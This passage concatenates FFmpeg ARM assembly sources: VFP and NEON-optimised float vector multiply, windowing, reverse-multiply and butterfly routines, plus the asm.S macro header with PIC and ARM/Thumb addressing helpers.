@ iteration, software-pipelined with conditional loads of the next block.
function ff_vector_fmul_vfp, export=1
vpush {d8-d15}                          @ s16-s31 are callee-saved
fmrx r12, fpscr
orr r12, r12, #(3 << 16) /* set vector size to 4 */
fmxr fpscr, r12
vldmia r1!, {s0-s3}                     @ prime first two 4-float groups
vldmia r2!, {s8-s11}
vldmia r1!, {s4-s7}
vldmia r2!, {s12-s15}
vmul.f32 s8, s0, s8                     @ vector op: s8-s11 = s0-s3 * s8-s11
1:
subs r3, r3, #16
vmul.f32 s12, s4, s12
itttt ge
vldmiage r1!, {s16-s19}                 @ if >=16 left: load next block
vldmiage r2!, {s24-s27}
vldmiage r1!, {s20-s23}
vldmiage r2!, {s28-s31}
it ge
vmulge.f32 s24, s16, s24
vstmia r0!, {s8-s11}
vstmia r0!, {s12-s15}
it ge
vmulge.f32 s28, s20, s28
itttt gt
vldmiagt r1!, {s0-s3}                   @ if more iterations follow: refill bank 0
vldmiagt r2!, {s8-s11}
vldmiagt r1!, {s4-s7}
vldmiagt r2!, {s12-s15}
ittt ge
vmulge.f32 s8, s0, s8
vstmiage r0!, {s24-s27}
vstmiage r0!, {s28-s31}
bgt 1b
bic r12, r12, #(7 << 16) /* set vector size back to 1 */
fmxr fpscr, r12
vpop {d8-d15}
bx lr
endfunc
/**
* ARM VFP implementation of 'vector_fmul_window_c' function
* Assume that len is a positive non-zero number
*/
@ void ff_vector_fmul_window_vfp(float *dst, const float *src0,
@ const float *src1, const float *win, int len)
@ void ff_vector_fmul_window_vfp(float *dst, const float *src0,
@                                const float *src1, const float *win, int len)
@ Overlap-add windowing on plain VFP.  Scalar-mode blocks first peel
@ len % 8 (1, then 2, then 4 samples); the bulk then runs in FPSCR
@ short-vector mode (LEN=4), 8 samples per iteration, writing dst forward
@ from DST0 and backward from DST1.
function ff_vector_fmul_window_vfp, export=1
DST0 .req a1
SRC0 .req a2
SRC1 .req a3
WIN0 .req a4
LEN .req v1
DST1 .req v2
WIN1 .req v3
OLDFPSCR .req ip
push {v1-v3,lr}
ldr LEN, [sp, #4*4+0]                   @ 5th argument from the stack
vpush {s16-s31}
fmrx OLDFPSCR, FPSCR                    @ FPSCR is restored before return
add DST1, DST0, LEN, lsl #3             @ one-past-end of dst (backward cursor)
add SRC1, SRC1, LEN, lsl #2
add WIN1, WIN0, LEN, lsl #3             @ backward cursor into the window
tst LEN, #7
beq 4f @ common case: len is a multiple of 8
ldr lr, =0x03000000 @ RunFast mode, scalar mode
fmxr FPSCR, lr
tst LEN, #1                             @ peel 1 sample
beq 1f
vldmdb WIN1!, {s0}
vldmia SRC0!, {s8}
vldmia WIN0!, {s16}
vmul.f s24, s0, s8
vldmdb SRC1!, {s20}
vmul.f s8, s16, s8
vmls.f s24, s16, s20
vmla.f s8, s0, s20
vstmia DST0!, {s24}
vstmdb DST1!, {s8}
1:
tst LEN, #2                             @ peel 2 samples
beq 2f
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmia SRC0!, {s8-s9}
vldmia WIN0!, {s16-s17}
vmul.f s24, s0, s8
vmul.f s25, s1, s9
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vmul.f s8, s16, s8
vmul.f s9, s17, s9
vmls.f s24, s16, s20
vmls.f s25, s17, s21
vmla.f s8, s0, s20
vmla.f s9, s1, s21
vstmia DST0!, {s24-s25}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
2:
tst LEN, #4                             @ peel 4 samples
beq 3f
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmdb WIN1!, {s2}
vldmdb WIN1!, {s3}
vldmia SRC0!, {s8-s11}
vldmia WIN0!, {s16-s19}
vmul.f s24, s0, s8
vmul.f s25, s1, s9
vmul.f s26, s2, s10
vmul.f s27, s3, s11
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vldmdb SRC1!, {s22}
vldmdb SRC1!, {s23}
vmul.f s8, s16, s8
vmul.f s9, s17, s9
vmul.f s10, s18, s10
vmul.f s11, s19, s11
vmls.f s24, s16, s20
vmls.f s25, s17, s21
vmls.f s26, s18, s22
vmls.f s27, s19, s23
vmla.f s8, s0, s20
vmla.f s9, s1, s21
vmla.f s10, s2, s22
vmla.f s11, s3, s23
vstmia DST0!, {s24-s27}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
vstmdb DST1!, {s10}
vstmdb DST1!, {s11}
3:
bics LEN, LEN, #7                       @ remaining multiple-of-8 part
beq 7f
4:
ldr lr, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, lr
vldmdb WIN1!, {s0}                      @ reversed window loaded one scalar at a time
vldmdb WIN1!, {s1}
vldmdb WIN1!, {s2}
vldmdb WIN1!, {s3}
vldmia SRC0!, {s8-s11}
vldmia WIN0!, {s16-s19}
vmul.f s24, s0, s8 @ vector * vector
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vldmdb SRC1!, {s22}
vldmdb SRC1!, {s23}
vmul.f s8, s16, s8 @ vector * vector
vmls.f s24, s16, s20 @ vector * vector
vldmdb WIN1!, {s4}
vldmdb WIN1!, {s5}
vldmdb WIN1!, {s6}
vldmdb WIN1!, {s7}
vldmia SRC0!, {s12-s13}
vmla.f s8, s0, s20 @ vector * vector
vldmia SRC0!, {s14-s15}
subs LEN, LEN, #8
beq 6f
5: vldmia WIN0!, {s20-s23}              @ pipelined main loop: 8 samples/iteration
vmul.f s28, s4, s12 @ vector * vector
vstmia DST0!, {s24-s25}
vldmdb SRC1!, {s16}
vldmdb SRC1!, {s17}
vldmdb SRC1!, {s18}
vldmdb SRC1!, {s19}
vmul.f s12, s20, s12 @ vector * vector
vstmia DST0!, {s26-s27}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
vstmdb DST1!, {s10}
vstmdb DST1!, {s11}
vmls.f s28, s20, s16 @ vector * vector
vldmdb WIN1!, {s0}
vldmdb WIN1!, {s1}
vldmdb WIN1!, {s2}
vldmdb WIN1!, {s3}
vldmia SRC0!, {s8-s9}
vmla.f s12, s4, s16 @ vector * vector
vldmia SRC0!, {s10-s11}
subs LEN, LEN, #8
vldmia WIN0!, {s16-s19}
vmul.f s24, s0, s8 @ vector * vector
vstmia DST0!, {s28-s29}
vldmdb SRC1!, {s20}
vldmdb SRC1!, {s21}
vldmdb SRC1!, {s22}
vldmdb SRC1!, {s23}
vmul.f s8, s16, s8 @ vector * vector
vstmia DST0!, {s30-s31}
vstmdb DST1!, {s12}
vstmdb DST1!, {s13}
vstmdb DST1!, {s14}
vstmdb DST1!, {s15}
vmls.f s24, s16, s20 @ vector * vector
vldmdb WIN1!, {s4}
vldmdb WIN1!, {s5}
vldmdb WIN1!, {s6}
vldmdb WIN1!, {s7}
vldmia SRC0!, {s12-s13}
vmla.f s8, s0, s20 @ vector * vector
vldmia SRC0!, {s14-s15}
bne 5b
6: vldmia WIN0!, {s20-s23}              @ epilogue: drain the final pipelined block
vmul.f s28, s4, s12 @ vector * vector
vstmia DST0!, {s24-s25}
vldmdb SRC1!, {s16}
vldmdb SRC1!, {s17}
vldmdb SRC1!, {s18}
vldmdb SRC1!, {s19}
vmul.f s12, s20, s12 @ vector * vector
vstmia DST0!, {s26-s27}
vstmdb DST1!, {s8}
vstmdb DST1!, {s9}
vstmdb DST1!, {s10}
vstmdb DST1!, {s11}
vmls.f s28, s20, s16 @ vector * vector
vmla.f s12, s4, s16 @ vector * vector
vstmia DST0!, {s28-s31}
vstmdb DST1!, {s12}
vstmdb DST1!, {s13}
vstmdb DST1!, {s14}
vstmdb DST1!, {s15}
7:
fmxr FPSCR, OLDFPSCR                    @ restore caller's FP mode
vpop {s16-s31}
pop {v1-v3,pc}
.unreq DST0
.unreq SRC0
.unreq SRC1
.unreq WIN0
.unreq LEN
.unreq OLDFPSCR
.unreq DST1
.unreq WIN1
endfunc
/**
* ARM VFP optimized implementation of 'vector_fmul_reverse_c' function.
* Assume that len is a positive number and is multiple of 8
*/
@ void ff_vector_fmul_reverse_vfp(float *dst, const float *src0,
@ const float *src1, int len)
@ void ff_vector_fmul_reverse_vfp(float *dst, const float *src0,
@                                 const float *src1, int len)
@ dst[i] = src0[i] * src1[len-1-i] on plain VFP.  src1 is walked backward
@ with vldmdb and reversed by crossing register indices (s3*s8, s2*s9, ...).
@ 16 floats per iteration, conditionally pipelined like ff_vector_fmul_vfp.
function ff_vector_fmul_reverse_vfp, export=1
vpush {d8-d15}                          @ s16-s31 are callee-saved
add r2, r2, r3, lsl #2                  @ r2 = src1 + len (floats)
vldmdb r2!, {s0-s3}
vldmia r1!, {s8-s11}
vldmdb r2!, {s4-s7}
vldmia r1!, {s12-s15}
vmul.f32 s8, s3, s8                     @ cross indices = reversed src1 order
vmul.f32 s9, s2, s9
vmul.f32 s10, s1, s10
vmul.f32 s11, s0, s11
1:
subs r3, r3, #16
it ge
vldmdbge r2!, {s16-s19}                 @ if >=16 left: load next block
vmul.f32 s12, s7, s12
it ge
vldmiage r1!, {s24-s27}
vmul.f32 s13, s6, s13
it ge
vldmdbge r2!, {s20-s23}
vmul.f32 s14, s5, s14
it ge
vldmiage r1!, {s28-s31}
vmul.f32 s15, s4, s15
it ge
vmulge.f32 s24, s19, s24
it gt
vldmdbgt r2!, {s0-s3}                   @ if more iterations follow: refill bank 0
it ge
vmulge.f32 s25, s18, s25
vstmia r0!, {s8-s13}
it ge
vmulge.f32 s26, s17, s26
it gt
vldmiagt r1!, {s8-s11}
itt ge
vmulge.f32 s27, s16, s27
vmulge.f32 s28, s23, s28
it gt
vldmdbgt r2!, {s4-s7}
it ge
vmulge.f32 s29, s22, s29
vstmia r0!, {s14-s15}
ittt ge
vmulge.f32 s30, s21, s30
vmulge.f32 s31, s20, s31
vmulge.f32 s8, s3, s8
it gt
vldmiagt r1!, {s12-s15}
itttt ge
vmulge.f32 s9, s2, s9
vmulge.f32 s10, s1, s10
vstmiage r0!, {s24-s27}
vmulge.f32 s11, s0, s11
it ge
vstmiage r0!, {s28-s31}
bgt 1b
vpop {d8-d15}
bx lr
endfunc
/**
* ARM VFP implementation of 'butterflies_float_c' function
* Assume that len is a positive non-zero number
*/
@ void ff_butterflies_float_vfp(float *restrict v1, float *restrict v2, int len)
@ void ff_butterflies_float_vfp(float *restrict v1, float *restrict v2, int len)
@ In-place butterfly: {v1[i], v2[i]} <- {v1[i]+v2[i], v1[i]-v2[i]}.
@ Scalar-mode blocks peel len % 8 (1, 2, 4 samples); the bulk runs in
@ FPSCR short-vector mode (LEN=4), 8 samples per iteration, storing
@ results back through negative offsets from the advanced base pointers.
function ff_butterflies_float_vfp, export=1
BASE1 .req a1
BASE2 .req a2
LEN .req a3
OLDFPSCR .req a4
vpush {s16-s31}                         @ callee-saved FP registers
fmrx OLDFPSCR, FPSCR                    @ restored before return
tst LEN, #7
beq 4f @ common case: len is a multiple of 8
ldr ip, =0x03000000 @ RunFast mode, scalar mode
fmxr FPSCR, ip
tst LEN, #1                             @ peel 1 sample
beq 1f
vldmia BASE1!, {s0}
vldmia BASE2!, {s8}
vadd.f s16, s0, s8
vsub.f s24, s0, s8
vstr s16, [BASE1, #0-4*1]
vstr s24, [BASE2, #0-4*1]
1:
tst LEN, #2                             @ peel 2 samples
beq 2f
vldmia BASE1!, {s0-s1}
vldmia BASE2!, {s8-s9}
vadd.f s16, s0, s8
vadd.f s17, s1, s9
vsub.f s24, s0, s8
vsub.f s25, s1, s9
vstr d8, [BASE1, #0-8*1] @ s16,s17
vstr d12, [BASE2, #0-8*1] @ s24,s25
2:
tst LEN, #4                             @ peel 4 samples
beq 3f
vldmia BASE1!, {s0-s1}
vldmia BASE2!, {s8-s9}
vldmia BASE1!, {s2-s3}
vldmia BASE2!, {s10-s11}
vadd.f s16, s0, s8
vadd.f s17, s1, s9
vsub.f s24, s0, s8
vsub.f s25, s1, s9
vadd.f s18, s2, s10
vadd.f s19, s3, s11
vsub.f s26, s2, s10
vsub.f s27, s3, s11
vstr d8, [BASE1, #0-16*1] @ s16,s17
vstr d12, [BASE2, #0-16*1] @ s24,s25
vstr d9, [BASE1, #8-16*1] @ s18,s19
vstr d13, [BASE2, #8-16*1] @ s26,s27
3:
bics LEN, LEN, #7                       @ remaining multiple-of-8 part
beq 7f
4:
ldr ip, =0x03030000 @ RunFast mode, short vectors of length 4, stride 1
fmxr FPSCR, ip
vldmia BASE1!, {s0-s1}                  @ prime the pipeline with 8 samples
vldmia BASE2!, {s8-s9}
vldmia BASE1!, {s2-s3}
vldmia BASE2!, {s10-s11}
vadd.f s16, s0, s8                      @ vector add (4 lanes)
vldmia BASE1!, {s4-s5}
vldmia BASE2!, {s12-s13}
vldmia BASE1!, {s6-s7}
vldmia BASE2!, {s14-s15}
vsub.f s24, s0, s8                      @ vector sub (4 lanes)
vadd.f s20, s4, s12
subs LEN, LEN, #8
beq 6f
5: vldmia BASE1!, {s0-s3}               @ pipelined main loop: 8 samples/iteration
vldmia BASE2!, {s8-s11}
vsub.f s28, s4, s12
vstr d8, [BASE1, #0-16*3] @ s16,s17    (stores land 3 blocks behind the cursor)
vstr d9, [BASE1, #8-16*3] @ s18,s19
vstr d12, [BASE2, #0-16*3] @ s24,s25
vstr d13, [BASE2, #8-16*3] @ s26,s27
vadd.f s16, s0, s8
vldmia BASE1!, {s4-s7}
vldmia BASE2!, {s12-s15}
vsub.f s24, s0, s8
vstr d10, [BASE1, #0-16*3] @ s20,s21
vstr d11, [BASE1, #8-16*3] @ s22,s23
vstr d14, [BASE2, #0-16*3] @ s28,s29
vstr d15, [BASE2, #8-16*3] @ s30,s31
vadd.f s20, s4, s12
subs LEN, LEN, #8
bne 5b
6: vsub.f s28, s4, s12                  @ epilogue: drain the final two blocks
vstr d8, [BASE1, #0-16*2] @ s16,s17
vstr d9, [BASE1, #8-16*2] @ s18,s19
vstr d12, [BASE2, #0-16*2] @ s24,s25
vstr d13, [BASE2, #8-16*2] @ s26,s27
vstr d10, [BASE1, #0-16*1] @ s20,s21
vstr d11, [BASE1, #8-16*1] @ s22,s23
vstr d14, [BASE2, #0-16*1] @ s28,s29
vstr d15, [BASE2, #8-16*1] @ s30,s31
7:
fmxr FPSCR, OLDFPSCR                    @ restore caller's FP mode
vpop {s16-s31}
bx lr
.unreq BASE1
.unreq BASE2
.unreq LEN
.unreq OLDFPSCR
endfunc
|
Akagi201/ffmpeg-xcode
| 8,298
|
ffmpeg-3.0.2/libavutil/arm/asm.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#ifdef __ELF__
# define ELF
#else
# define ELF @
#endif
#if CONFIG_THUMB
# define A @
# define T
#else
# define A
# define T @
#endif
#if HAVE_AS_FUNC
# define FUNC
#else
# define FUNC @
#endif
#if HAVE_NEON
.arch armv7-a
#elif HAVE_ARMV6T2
.arch armv6t2
#elif HAVE_ARMV6
.arch armv6
#elif HAVE_ARMV5TE
.arch armv5te
#endif
#if HAVE_AS_OBJECT_ARCH
ELF .object_arch armv4
#endif
#if HAVE_NEON
.fpu neon
ELF .eabi_attribute 10, 0 @ suppress Tag_FP_arch
ELF .eabi_attribute 12, 0 @ suppress Tag_Advanced_SIMD_arch
#elif HAVE_VFP
.fpu vfp
ELF .eabi_attribute 10, 0 @ suppress Tag_FP_arch
#endif
.syntax unified
T .thumb
ELF .eabi_attribute 25, 1 @ Tag_ABI_align_preserved
ELF .section .note.GNU-stack,"",%progbits @ Mark stack as non-executable
@ Define an assembler function.  \name is the symbol, export=1 makes it
@ global under the platform's EXTERN_ASM prefix, \align is the log2 code
@ alignment.  Also (re)defines a matching `endfunc` macro that flushes any
@ PIC literal words queued by def_pic and emits the ELF .size directive.
.macro function name, export=0, align=2
.set .Lpic_idx, 0 @ number of queued PIC literal-pool entries
.set .Lpic_gp, 0 @ nonzero once movrelx has set up a GOT pointer
.macro endfunc
.if .Lpic_idx
.align 2
.altmacro
put_pic %(.Lpic_idx - 1) @ emit all deferred PIC literals
.noaltmacro
.endif
ELF .size \name, . - \name
FUNC .endfunc
.purgem endfunc
.endm
.text
.align \align
.if \export
.global EXTERN_ASM\name
ELF .type EXTERN_ASM\name, %function
FUNC .func EXTERN_ASM\name
EXTERN_ASM\name:
.else
ELF .type \name, %function
FUNC .func \name
\name:
.endif
.endm
@ Declare a named constant-data object, placed in .rodata, or in
@ .data.rel.ro when relocate=1 and the target supports it (data that
@ contains load-time relocations).  Terminated by the generated
@ `endconst`, which emits the ELF size.
.macro const name, align=2, relocate=0
.macro endconst
ELF .size \name, . - \name
.purgem endconst
.endm
.if HAVE_SECTION_DATA_REL_RO && \relocate
.section .data.rel.ro
.else
.section .rodata
.endif
.align \align
\name:
.endm
#if !HAVE_ARMV6T2_EXTERNAL
@ Fallback movw for cores without the real ARMv6T2 instruction: build the
@ value from its low byte plus the remaining bits (each half must be an
@ encodable ARM immediate).
.macro movw rd, val
mov \rd, \val & 255
orr \rd, \val & ~255
.endm
#endif
@ Load an arbitrary 32-bit constant: movw/movt pair on ARMv6T2+,
@ literal-pool load otherwise.
.macro mov32 rd, val
#if HAVE_ARMV6T2_EXTERNAL
movw \rd, #(\val) & 0xffff
.if (\val) >> 16
movt \rd, #(\val) >> 16
.endif
#else
ldr \rd, =\val
#endif
.endm
@ --- PC-relative literal machinery -------------------------------------
@ def_pic queues a literal .word for the current function; put_pic
@ (invoked from endfunc) emits every queued word, recursing so that older
@ entries come out first.
.macro put_pic num
put_pic_\num
.endm
.macro do_def_pic num, val, label
.macro put_pic_\num
.if \num
.altmacro
put_pic %(\num - 1) @ emit older literals first
.noaltmacro
.endif
\label: .word \val
.purgem put_pic_\num
.endm
.endm
@ Queue literal word \val under \label for emission at endfunc.
.macro def_pic val, label
.altmacro
do_def_pic %.Lpic_idx, \val, \label
.noaltmacro
.set .Lpic_idx, .Lpic_idx + 1
.endm
@ PC-relative load of \val into \rd; indir=1 adds one extra dereference
@ (used for Mach-O non-lazy symbol pointers).  The literal is biased by
@ the pc-read offset: +8 in ARM mode, +4 in Thumb.
.macro ldpic rd, val, indir=0
ldr \rd, .Lpicoff\@
.Lpic\@:
.if \indir
A ldr \rd, [pc, \rd]
T add \rd, pc
T ldr \rd, [\rd]
.else
add \rd, pc
.endif
def_pic \val - (.Lpic\@ + (8 >> CONFIG_THUMB)), .Lpicoff\@
.endm
@ Load the address of local symbol \val into \rd using whichever of PIC,
@ movw/movt or a literal pool the build configuration allows.
.macro movrel rd, val
#if CONFIG_PIC
ldpic \rd, \val
#elif HAVE_ARMV6T2_EXTERNAL && !defined(__APPLE__)
movw \rd, #:lower16:\val
movt \rd, #:upper16:\val
#else
ldr \rd, =\val
#endif
.endm
@ Like movrel but for symbols that may live in another DSO: goes through
@ the GOT on ELF PIC builds (\gp optionally names the register holding
@ the GOT address, r12 by default) and through an indirect symbol pointer
@ on Darwin.
.macro movrelx rd, val, gp
#if CONFIG_PIC && defined(__ELF__)
.ifnb \gp
.if .Lpic_gp
.unreq gp
.endif
gp .req \gp
ldpic gp, _GLOBAL_OFFSET_TABLE_
.elseif !.Lpic_gp
gp .req r12
ldpic gp, _GLOBAL_OFFSET_TABLE_
.endif
.set .Lpic_gp, 1 @ remember the GOT pointer is live in this function
ldr \rd, .Lpicoff\@
ldr \rd, [gp, \rd]
def_pic \val(GOT), .Lpicoff\@
#elif CONFIG_PIC && defined(__APPLE__)
ldpic \rd, .Lpic\@, indir=1
.non_lazy_symbol_pointer
.Lpic\@:
.indirect_symbol \val
.word 0
.text
#else
movrel \rd, \val
#endif
.endm
@ --- ARM/Thumb-agnostic addressing-mode helpers ------------------------
@ Thumb-2 cannot encode every ARM writeback addressing mode, so each
@ macro emits one ARM instruction under the A prefix and an equivalent
@ multi-instruction sequence under the T prefix.  Naming convention:
@ _pre = pre-indexed with writeback, _dpre = pre-decrement,
@ _post = post-increment, _dpost = post-decrement,
@ _nreg = negative register offset without writeback.
@ NOTE: the Thumb expansions may clobber flags differently and the
@ add_sh Thumb path modifies \rm.
.macro add_sh rd, rn, rm, sh:vararg
A add \rd, \rn, \rm, \sh
T mov \rm, \rm, \sh
T add \rd, \rn, \rm
.endm
.macro ldr_pre rt, rn, rm:vararg
A ldr \rt, [\rn, \rm]!
T add \rn, \rn, \rm
T ldr \rt, [\rn]
.endm
.macro ldr_dpre rt, rn, rm:vararg
A ldr \rt, [\rn, -\rm]!
T sub \rn, \rn, \rm
T ldr \rt, [\rn]
.endm
.macro ldr_nreg rt, rn, rm:vararg
A ldr \rt, [\rn, -\rm]
T sub \rt, \rn, \rm
T ldr \rt, [\rt]
.endm
.macro ldr_post rt, rn, rm:vararg
A ldr \rt, [\rn], \rm
T ldr \rt, [\rn]
T add \rn, \rn, \rm
.endm
@ Conditional pre-indexed load; the Thumb path needs an IT block.
.macro ldrc_pre cc, rt, rn, rm:vararg
A ldr\cc \rt, [\rn, \rm]!
T itt \cc
T add\cc \rn, \rn, \rm
T ldr\cc \rt, [\rn]
.endm
@ Doubleword load with register offset; Thumb path uses \rt as scratch.
.macro ldrd_reg rt, rt2, rn, rm
A ldrd \rt, \rt2, [\rn, \rm]
T add \rt, \rn, \rm
T ldrd \rt, \rt2, [\rt]
.endm
.macro ldrd_post rt, rt2, rn, rm
A ldrd \rt, \rt2, [\rn], \rm
T ldrd \rt, \rt2, [\rn]
T add \rn, \rn, \rm
.endm
.macro ldrh_pre rt, rn, rm
A ldrh \rt, [\rn, \rm]!
T add \rn, \rn, \rm
T ldrh \rt, [\rn]
.endm
.macro ldrh_dpre rt, rn, rm
A ldrh \rt, [\rn, -\rm]!
T sub \rn, \rn, \rm
T ldrh \rt, [\rn]
.endm
.macro ldrh_post rt, rn, rm
A ldrh \rt, [\rn], \rm
T ldrh \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro ldrb_post rt, rn, rm
A ldrb \rt, [\rn], \rm
T ldrb \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro str_post rt, rn, rm:vararg
A str \rt, [\rn], \rm
T str \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro strb_post rt, rn, rm:vararg
A strb \rt, [\rn], \rm
T strb \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro strd_post rt, rt2, rn, rm
A strd \rt, \rt2, [\rn], \rm
T strd \rt, \rt2, [\rn]
T add \rn, \rn, \rm
.endm
.macro strh_pre rt, rn, rm
A strh \rt, [\rn, \rm]!
T add \rn, \rn, \rm
T strh \rt, [\rn]
.endm
.macro strh_dpre rt, rn, rm
A strh \rt, [\rn, -\rm]!
T sub \rn, \rn, \rm
T strh \rt, [\rn]
.endm
.macro strh_post rt, rn, rm
A strh \rt, [\rn], \rm
T strh \rt, [\rn]
T add \rn, \rn, \rm
.endm
.macro strh_dpost rt, rn, rm
A strh \rt, [\rn], -\rm
T strh \rt, [\rn]
T sub \rn, \rn, \rm
.endm
@ VFP-prefixed lines assemble only with hard-float (VFP) argument
@ passing; NOVFP lines only with soft-float.  Tag_ABI_VFP_args marks the
@ object as using VFP argument registers.
#if HAVE_VFP_ARGS
ELF .eabi_attribute 28, 1
# define VFP
# define NOVFP @
#else
# define VFP @
# define NOVFP
#endif
/* X(sym) expands to the platform-mangled name of an exported symbol. */
#define GLUE(a, b) a ## b
#define JOIN(a, b) GLUE(a, b)
#define X(s) JOIN(EXTERN_ASM, s)
|
Akagi201/ffmpeg-xcode
| 9,779
|
ffmpeg-3.0.2/libavutil/arm/float_dsp_neon.S
|
/*
* ARM NEON optimised Float DSP functions
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "config.h"
#include "asm.S"
@ void ff_vector_fmul(float *dst, const float *src0, const float *src1,
@                     int len)
@ r0 = dst, r1 = src0, r2 = src1, r3 = len.
@ dst[i] = src0[i] * src1[i].  Assumes len is a non-zero multiple of 8
@ and all buffers 16-byte aligned (FFmpeg contract — the :128 alignment
@ hints fault otherwise).
function ff_vector_fmul_neon, export=1
subs r3, r3, #8 @ consume the first 8 elements up front
vld1.32 {d0-d3}, [r1,:128]!
vld1.32 {d4-d7}, [r2,:128]!
vmul.f32 q8, q0, q2
vmul.f32 q9, q1, q3
beq 3f @ exactly 8: just store and return
bics ip, r3, #15 @ ip = remainder rounded down to multiple of 16
beq 2f @ only 8 more: single trailing pass
1: subs ip, ip, #16 @ main loop: 16 floats/iteration, loads and
vld1.32 {d0-d1}, [r1,:128]! @ stores overlapped with the multiplies
vld1.32 {d4-d5}, [r2,:128]!
vmul.f32 q10, q0, q2
vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d6-d7}, [r2,:128]!
vmul.f32 q11, q1, q3
vst1.32 {d16-d19},[r0,:128]! @ store previous 8 products
vld1.32 {d0-d1}, [r1,:128]!
vld1.32 {d4-d5}, [r2,:128]!
vmul.f32 q8, q0, q2
vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d6-d7}, [r2,:128]!
vmul.f32 q9, q1, q3
vst1.32 {d20-d23},[r0,:128]!
bne 1b
ands r3, r3, #15 @ 8-element tail left over?
beq 3f
2: vld1.32 {d0-d1}, [r1,:128]! @ trailing 8 elements
vld1.32 {d4-d5}, [r2,:128]!
vst1.32 {d16-d17},[r0,:128]!
vmul.f32 q8, q0, q2
vld1.32 {d2-d3}, [r1,:128]!
vld1.32 {d6-d7}, [r2,:128]!
vst1.32 {d18-d19},[r0,:128]!
vmul.f32 q9, q1, q3
3: vst1.32 {d16-d19},[r0,:128]! @ flush the last 8 products
bx lr
endfunc
@ void ff_vector_fmac_scalar(float *dst, const float *src, float mul,
@                            int len)
@ dst[i] += src[i] * mul.  Hard-float ABI: r0 = dst, r1 = src, s0 = mul,
@ r2 = len; soft-float: mul bits arrive in r2 and len in r3.  len is
@ assumed a non-zero multiple of 4; buffers 16-byte aligned.
function ff_vector_fmac_scalar_neon, export=1
VFP len .req r2
VFP acc .req r3
NOVFP len .req r3
NOVFP acc .req r2
VFP vdup.32 q15, d0[0] @ broadcast the scalar to all 4 lanes
NOVFP vdup.32 q15, r2
bics r12, len, #15 @ r12 = len rounded down to multiple of 16
mov acc, r0 @ second read pointer into dst
beq 3f @ <16 elements: 4-at-a-time loop only
vld1.32 {q0}, [r1,:128]!
vld1.32 {q8}, [acc,:128]!
vld1.32 {q1}, [r1,:128]!
vld1.32 {q9}, [acc,:128]!
1: vmla.f32 q8, q0, q15 @ main loop: 16 floats per iteration
vld1.32 {q2}, [r1,:128]!
vld1.32 {q10}, [acc,:128]!
vmla.f32 q9, q1, q15
vld1.32 {q3}, [r1,:128]!
vld1.32 {q11}, [acc,:128]!
vmla.f32 q10, q2, q15
vst1.32 {q8}, [r0,:128]!
vmla.f32 q11, q3, q15
vst1.32 {q9}, [r0,:128]!
subs r12, r12, #16
beq 2f
vld1.32 {q0}, [r1,:128]!
vld1.32 {q8}, [acc,:128]!
vst1.32 {q10}, [r0,:128]!
vld1.32 {q1}, [r1,:128]!
vld1.32 {q9}, [acc,:128]!
vst1.32 {q11}, [r0,:128]!
b 1b
2: vst1.32 {q10}, [r0,:128]! @ drain the pipelined stores
vst1.32 {q11}, [r0,:128]!
ands len, len, #15 @ tail elements remaining?
it eq
bxeq lr
3: vld1.32 {q0}, [r1,:128]! @ tail: 4 floats per iteration
vld1.32 {q8}, [acc,:128]!
vmla.f32 q8, q0, q15
vst1.32 {q8}, [r0,:128]!
subs len, len, #4
bgt 3b
bx lr
.unreq len
endfunc
@ void ff_vector_fmul_scalar(float *dst, const float *src, float mul,
@                            int len)
@ dst[i] = src[i] * mul.  Hard-float ABI: r0 = dst, r1 = src, s0 = mul,
@ r2 = len; soft-float: mul bits in r2, len in r3.  len assumed a
@ non-zero multiple of 4; buffers 16-byte aligned.
function ff_vector_fmul_scalar_neon, export=1
VFP len .req r2
NOVFP len .req r3
VFP vdup.32 q8, d0[0] @ broadcast the scalar
NOVFP vdup.32 q8, r2
bics r12, len, #15 @ r12 = len rounded down to multiple of 16
beq 3f @ <16 elements: 4-at-a-time loop only
vld1.32 {q0},[r1,:128]!
vld1.32 {q1},[r1,:128]!
1: vmul.f32 q0, q0, q8 @ main loop: 16 floats per iteration
vld1.32 {q2},[r1,:128]!
vmul.f32 q1, q1, q8
vld1.32 {q3},[r1,:128]!
vmul.f32 q2, q2, q8
vst1.32 {q0},[r0,:128]!
vmul.f32 q3, q3, q8
vst1.32 {q1},[r0,:128]!
subs r12, r12, #16
beq 2f
vld1.32 {q0},[r1,:128]!
vst1.32 {q2},[r0,:128]!
vld1.32 {q1},[r1,:128]!
vst1.32 {q3},[r0,:128]!
b 1b
